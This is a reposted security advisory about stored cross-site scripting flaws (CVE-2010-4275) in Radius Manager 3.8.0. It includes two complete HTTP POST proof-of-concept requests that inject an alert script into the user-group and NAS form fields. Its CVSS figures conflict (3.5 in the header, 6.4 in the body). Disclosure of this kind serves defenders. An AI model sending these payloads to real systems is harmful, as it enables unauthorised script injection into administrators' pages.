Radius Manager 3.8.0 Multiple XSS Vulnerabilities

2010.12.23
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Check Point Software Technologies - Vulnerability Discovery Team (VDT) http://www.checkpoint.com/defense/ Radius Manager Multiple Cross Site Scripting Issues CVE-2010-4275 INTRODUCTION Radius Manager is a centralized way for administration of Mikrotik, Cisco, Chillispot and StarOS routers and wireless access points. It has a centralized accounting system that uses Radius, provinding easy user and accounting management for ISP's. This problem was confirmed in the following versions of the Radius Manager, other versions maybe also affected. Radius Manager 3.8.0 CVSS Scoring System The CVSS score is: 6.4 Base Score: 6.7 Temporal Score: 6.4 We used the following values to calculate the scores: Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N Temporal score is: E:F/RL:U/RC:C DETAILS The Radius Manager system is affected by Multiple Stored Cross Site Scripting. The &#65533;&#65533;Group Name&#65533;&#65533; and &#65533;&#65533;Description&#65533;&#65533; in &#65533;&#65533;new_usergroup&#65533;&#65533; menu do not sanitize input data, allowing attacker to store malicious javascript code in a page. The same thing occurs with &#65533;&#65533;new_nas&#65533;&#65533; menu Request: http://<server>/admin.php?cont=update_usergroup&id=1 POST /admin.php?cont=update_usergroup&id=1 HTTP/1.1 Host: <server> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://<server>/admin.php?cont=edit_usergroup&id=1 Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username Content-Type: application/x-www-form-urlencoded Content-Length: 120 name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Update Request 2: http://<serveR>/admin.php?cont=store_nas POST /admin.php?cont=store_nas HTTP/1.1 Host: <server> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://<server>/admin.php?cont=new_nas Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username Content-Type: application/x-www-form-urlencoded Content-Length: 112 name=Name&nasip=10.0.0.1&type=0&secret=1111&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Add+NAS CREDITS This vulnerability has been brought to our attention by Ulisses Castro from Conviso IT Security company (http://www.conviso.com.br) and researched internally by Rodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT). Rodrigo Rubira Branco Senior Security Researcher Vulnerability Discovery Team (VDT) Check Point Software Technologies http://www.checkpoint.com/defense

References:

http://xforce.iss.net/xforce/xfdb/64199
http://www.securityfocus.com/bid/45481
http://www.exploit-db.com/exploits/15766
http://secunia.com/advisories/42364


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top